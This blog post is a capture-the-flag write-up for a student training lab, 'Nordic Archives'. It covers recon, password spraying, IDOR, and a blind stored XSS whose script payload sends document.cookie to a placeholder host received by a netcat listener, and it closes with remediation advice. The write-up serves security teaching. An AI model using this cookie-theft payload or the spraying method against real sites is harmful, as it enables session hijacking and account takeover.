<!DOCTYPE html><html lang="en" data-astro-cid-bvzihdzo> <head><!-- Global Metadata --><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#1e1e2e"><link rel="icon" type="image/svg+xml" href="/blog/favicon.svg"><link rel="icon" href="/blog/favicon.ico"><link rel="sitemap" href="/blog/sitemap-index.xml"><link rel="alternate" type="application/rss+xml" title="Ettelmans Blog" href="https://ettelman.github.io/blog/rss.xml"><meta name="generator" content="Astro v5.17.0"><!-- Font preloads --><link rel="preload" href="/blog/fonts/atkinson-regular.woff" as="font" type="font/woff" crossorigin><link rel="preload" href="/blog/fonts/atkinson-bold.woff" as="font" type="font/woff" crossorigin><!-- Canonical URL --><link rel="canonical" href="https://ettelman.github.io/blog/nordic/"><!-- Primary Meta Tags --><title>Nordic Archives - Writeup</title><meta name="title" content="Nordic Archives - Writeup"><meta name="description" content="Writeup for Nordic Archives"><!-- Open Graph / Facebook --><meta property="og:type" content="website"><meta property="og:url" content="https://ettelman.github.io/blog/nordic/"><meta property="og:title" content="Nordic Archives - Writeup"><meta property="og:description" content="Writeup for Nordic Archives"><meta property="og:image" content="https://ettelman.github.io/blog/assets/pentestfriend.D52PjD90.jpg"><!-- Twitter --><meta property="twitter:card" content="summary_large_image"><meta property="twitter:url" content="https://ettelman.github.io/blog/nordic/"><meta property="twitter:title" content="Nordic Archives - Writeup"><meta property="twitter:description" content="Writeup for Nordic Archives"><meta property="twitter:image" content="https://ettelman.github.io/blog/assets/pentestfriend.D52PjD90.jpg"><link rel="stylesheet" href="/blog/assets/_slug_.Du_yUEJX.css">
<style>main[data-astro-cid-bvzihdzo]{width:min(var(--content-width),calc(100% - 2.5rem));margin:0 auto;padding:3rem 0 4rem}.hero-image[data-astro-cid-bvzihdzo]{width:100%;margin-bottom:2rem}.hero-image[data-astro-cid-bvzihdzo] img[data-astro-cid-bvzihdzo]{display:block;margin:0 auto;border-radius:0;border:1px solid var(--border);box-shadow:var(--shadow-soft)}.prose[data-astro-cid-bvzihdzo]{width:100%;max-width:100%;margin:0 auto;color:var(--ctp-text);background:var(--ctp-mantle);border:1px solid var(--border);border-top:2px solid var(--accent);border-radius:0;box-shadow:var(--shadow-soft)}.prose-header[data-astro-cid-bvzihdzo]{display:flex;align-items:center;gap:.5rem;padding:.5rem 1.5rem;border-bottom:1px solid var(--border);background:var(--ctp-crust);font-size:.7rem;letter-spacing:.08em;color:var(--muted);text-transform:uppercase}.prose-header[data-astro-cid-bvzihdzo] .dot[data-astro-cid-bvzihdzo]{width:8px;height:8px;border-radius:0;background:var(--accent);display:inline-block}.prose-body[data-astro-cid-bvzihdzo]{padding:2.4rem clamp(1.4rem,2vw,2.8rem) 2.8rem;max-width:calc(var(--reading-width) + 5rem);margin:0 auto;font-size:1.05rem;line-height:1.9}.title[data-astro-cid-bvzihdzo]{margin-bottom:1em;padding:0;text-align:left;line-height:1}.title[data-astro-cid-bvzihdzo] h1[data-astro-cid-bvzihdzo]{margin:0 0 .75em;font-size:clamp(2rem,2.6vw,2.8rem)}.date[data-astro-cid-bvzihdzo]{margin-bottom:.5em;color:var(--ctp-subtext1);font-size:.9rem;letter-spacing:.05em}.last-updated-on[data-astro-cid-bvzihdzo]{font-style:italic;color:var(--ctp-subtext1)}.prose-body[data-astro-cid-bvzihdzo]>[data-astro-cid-bvzihdzo]:where(p,ul,ol,blockquote,pre,table){max-width:var(--reading-width)}.prose-body[data-astro-cid-bvzihdzo]>[data-astro-cid-bvzihdzo]:where(ul,ol){padding-left:1.35rem}.prose-body[data-astro-cid-bvzihdzo] li[data-astro-cid-bvzihdzo]+li[data-astro-cid-bvzihdzo]{margin-top:.45rem}.prose-body[data-astro-cid-bvzihdzo]>[data-astro-cid-bvzihdzo]:where(h2,h3,h4){margin-top:2.2rem}
</style></head> <body data-astro-cid-bvzihdzo> <header data-astro-cid-3ef6ksr2> <nav data-astro-cid-3ef6ksr2> <h2 data-astro-cid-3ef6ksr2> <a href="/blog/" data-astro-cid-3ef6ksr2> <span class="logo-user" data-astro-cid-3ef6ksr2>ettelman</span><span class="logo-at" data-astro-cid-3ef6ksr2>@</span><span class="logo-host" data-astro-cid-3ef6ksr2>blog</span><span class="logo-sep" data-astro-cid-3ef6ksr2>:~$</span> </a> </h2> <a class="rss-link" href="/blog/rss.xml" data-astro-cid-3ef6ksr2>RSS</a> </nav> </header>  <main data-astro-cid-bvzihdzo> <article data-astro-cid-bvzihdzo> <div class="hero-image" data-astro-cid-bvzihdzo> <img src="/blog/assets/nordic_top.BaDnGogC_8IO8L.webp" alt data-astro-cid-bvzihdzo="true" loading="lazy" decoding="async" fetchpriority="auto" width="1020" height="510"> </div> <div class="prose" data-astro-cid-bvzihdzo> <div class="prose-header" data-astro-cid-bvzihdzo> <span class="dot" data-astro-cid-bvzihdzo></span> <span data-astro-cid-bvzihdzo>post</span> </div> <div class="prose-body" data-astro-cid-bvzihdzo> <div class="title" data-astro-cid-bvzihdzo> <div class="date" data-astro-cid-bvzihdzo> <time datetime="2026-02-14T23:00:00.000Z"> Feb 15, 2026 </time>  </div> <h1 data-astro-cid-bvzihdzo>Nordic Archives - Writeup</h1> <hr data-astro-cid-bvzihdzo> </div>  <p>I built this challenge to give my students some practice with OSINT and basic web attacks.<br>
95% of frontend and alot of the backend is “vibe coded”.<br>
The overall difficulty is somewhere between beginner and intermediate imo.</p>
<p><img alt="Challenge overview" loading="lazy" decoding="async" fetchpriority="auto" width="1964" height="1873" src="/blog/assets/hero.DYFddia7_ZXcxaz.webp" ></p>
<hr>
<h2 id="setup-local-run">Setup (local run)</h2>
<p>Start the lab using Docker Compose:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#B392F0">docker</span><span style="color:#9ECBFF"> compose</span><span style="color:#9ECBFF"> up</span><span style="color:#79B8FF"> --build</span></span></code></pre>
<hr>
<h2 id="part-1--vault-flag">Part 1 — Vault flag</h2>
<p>The first step is a classic recon:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#B392F0">GET</span><span style="color:#9ECBFF"> /robots.txt</span></span></code></pre>
<p>This file points to a disallowed path that is quite useful.<br>
The page reveals guest credentials, which can be used to log in and review documents in the guest portal.</p>
<p><img alt="Guest access page with credentials" loading="lazy" decoding="async" fetchpriority="auto" width="1853" height="1005" src="/blog/assets/guest.CJcSJsAz_1kyBBV.webp" ></p>
<p>Logging into the guest portal, we discover an old password previously used by a staff member: <code>Winter2021!</code>.</p>
<p>Using this information together with staff email addresses gathered from the About page, we can perform some classic password spraying. Eventually, we discover that the user <code>sofia.ek</code> is using the password <code>Winter2025!</code>.</p>
<p><img alt="Password spraying" loading="lazy" decoding="async" fetchpriority="auto" width="1644" height="1728" src="/blog/assets/spray.BxaRPlQn_Z1fqYR5.webp" ></p>
<p>Once logged in as a staff member, we can read messages. The message ID is disclosed in the URL. Let’s try for IDOR. This eventuellay gives us access to other messages and we recover both a password and a hint.</p>
<p>Password: <code>xqrl42x7</code></p>
<p>The hint points us to GitHub. There is a user named <code>nordicarchives</code> with a single repository:<br>
<a href="https://github.com/nordicarchives/nordicarchives">https://github.com/nordicarchives/nordicarchives</a></p>
<p>Inside the repository, we find a vault key:</p>
<p>Vault key: <code>nordicvault42secret</code></p>
<p>The final clue is an image exposed via the <code>/services</code> endpoint, which shows a username on a computer screen:</p>
<p>Username: <code>k.andersson</code></p>
<p>With all of this information, we can authenticate to the <code>/vault</code> endpoint and retrieve the first flag. This endpoint can be found with basic enumeration.</p>
<hr>
<h2 id="flag-2--admin-flag-blind-stored-xss">Flag 2 — Admin flag (blind stored XSS)</h2>
<p>The contact form is the key point here. Submitted messages are stored and later reviewed by an admin bot in the admin panel. The message body is rendered without escaping, allowing HTML and JavaScript to execute in the admin’s session context.</p>
<p>Additionally, the session cookie is not marked as <code>HttpOnly</code>, classic hint for session hijacking.</p>
<h3 id="example-payload">Example payload</h3>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="html"><code><span class="line"><span style="color:#E1E4E8">&#x3C;</span><span style="color:#85E89D">script</span><span style="color:#E1E4E8">></span></span>
<span class="line"><span style="color:#F97583">new</span><span style="color:#B392F0"> Image</span><span style="color:#E1E4E8">().src</span><span style="color:#F97583">=</span><span style="color:#9ECBFF">'http://ip:port/?d='</span><span style="color:#F97583">+</span><span style="color:#E1E4E8">document.cookie</span></span>
<span class="line"><span style="color:#E1E4E8">&#x3C;/</span><span style="color:#85E89D">script</span><span style="color:#E1E4E8">></span></span></code></pre>
<p><img alt="Contact form with XSS payload" loading="lazy" decoding="async" fetchpriority="auto" width="833" height="836" src="/blog/assets/xss.Bv6dzi4q_ZEsduc.webp" ></p>
<h3 id="listener">Listener</h3>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#B392F0">nc</span><span style="color:#79B8FF"> -lvnp</span><span style="color:#79B8FF"> 4444</span></span></code></pre>
<p>When the admin bot loads the message, the callback is received. This gives us the admin session cookie, which can then be reused to access the admin panel. The admin flag is displayed on the dashboard.</p>
<p><img alt="Netcat listener receiving the callback" loading="lazy" decoding="async" fetchpriority="auto" width="1741" height="356" src="/blog/assets/nc.BUDQqtAI_123MDO.webp" ></p>
<h3 id="why-this-works">Why this works</h3>
<ul>
<li>The admin bot logs in and opens <code>/admin/messages/:id</code>.</li>
<li>Message content is rendered without escaping, enabling stored XSS.</li>
<li>Session cookies are accessible via JavaScript.</li>
</ul>
<h3 id="how-to-make-this-safe-real-world">How to make this safe (real world)</h3>
<ul>
<li>Always escape user-generated content in templates (EJS: use <code>&#x3C;%=</code> instead of <code>&#x3C;%-</code>).</li>
<li>Sanitize input if HTML support is required.</li>
<li>Enforce a strict Content Security Policy (CSP).</li>
<li>Set session cookies with <code>HttpOnly</code>, <code>Secure</code>, and <code>SameSite=Strict</code>.</li>
</ul>
<hr>
<h2 id="puppeteer-bot-implementation-how-its-wired">Puppeteer bot implementation (how it’s wired)</h2>
<p>The admin bot is implemented in <code>services/admin-bot.js</code> and performs the following steps:</p>
<ol>
<li>Builds the base URL from <code>APP_BASE_URL</code> (defaults to <code>http://localhost:PORT</code>).</li>
<li>Launches Chromium using Puppeteer in headless mode.</li>
<li>Logs in using <code>ADMIN_EMAIL</code> and <code>ADMIN_PASSWORD</code>.</li>
<li>Visits <code>/admin/messages/:id</code>.</li>
<li>Waits briefly before exiting (with a timeout).</li>
</ol>
<hr>
<h2 id="security-takeaways">Security takeaways</h2>
<ul>
<li>Escape or sanitize all user-controlled input.</li>
<li>Remove hints and credentials from public pages and <code>robots.txt</code>.</li>
<li>Use stronger authentication (MFA, rate limiting, lockouts).</li>
<li>Set secure session cookie flags and implement CSRF protection.</li>
<li>Store secrets outside of source control and rotate them regularly.</li>
</ul>
<hr>  </div> </div> </article> </main> <footer data-astro-cid-sz7xmlte> <div class="footer-inner" data-astro-cid-sz7xmlte> <span data-astro-cid-sz7xmlte>&copy; 2026 Ettelmans Blog</span> <div class="social-links" data-astro-cid-sz7xmlte> <a href="https://github.com/ettelman" target="_blank" data-astro-cid-sz7xmlte> <span class="sr-only" data-astro-cid-sz7xmlte>GitHub</span> <svg viewBox="0 0 16 16" aria-hidden="true" width="20" height="20" data-astro-cid-sz7xmlte><path fill="currentColor" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z" data-astro-cid-sz7xmlte></path></svg> </a> </div> </div> </footer>  <script>
			// Lightbox
			const overlay = document.createElement('div');
			overlay.className = 'lightbox';
			const lbImg = document.createElement('img');
			overlay.appendChild(lbImg);
			document.body.appendChild(overlay);
			overlay.addEventListener('click', () => overlay.classList.remove('active'));
			document.querySelectorAll('.prose-body img').forEach(img => {
				img.addEventListener('click', () => {
					lbImg.src = img.src;
					lbImg.alt = img.alt;
					overlay.classList.add('active');
				});
			});

			const codeBlocks = document.querySelectorAll('pre > code');
			const copyText = async (text) => {
				if (navigator.clipboard?.writeText) {
					await navigator.clipboard.writeText(text);
					return;
				}
				const textarea = document.createElement('textarea');
				textarea.value = text;
				textarea.style.position = 'fixed';
				textarea.style.opacity = '0';
				document.body.appendChild(textarea);
				textarea.select();
				document.execCommand('copy');
				textarea.remove();
			};

			codeBlocks.forEach((code) => {
				const pre = code.parentElement;
				if (!pre || pre.dataset.copyReady === 'true') return;
				pre.dataset.copyReady = 'true';

				const lang = [...code.classList]
					.find(c => c.startsWith('language-'))
					?.replace('language-', '') ?? '';

				const header = document.createElement('div');
				header.className = 'code-header';

				const langLabel = document.createElement('span');
				langLabel.className = 'code-lang';
				langLabel.textContent = lang || 'code';

				const button = document.createElement('button');
				button.type = 'button';
				button.className = 'copy-button';
				button.textContent = 'copy';

				button.addEventListener('click', async () => {
					try {
						await copyText(code.textContent ?? '');
						button.textContent = 'copied';
						button.classList.add('copied');
						setTimeout(() => {
							button.textContent = 'copy';
							button.classList.remove('copied');
						}, 2000);
					} catch (err) {
						console.error('Failed to copy code block', err);
					}
				});

				header.appendChild(langLabel);
				header.appendChild(button);
				pre.insertBefore(header, pre.firstChild);
			});
		</script> </body> </html>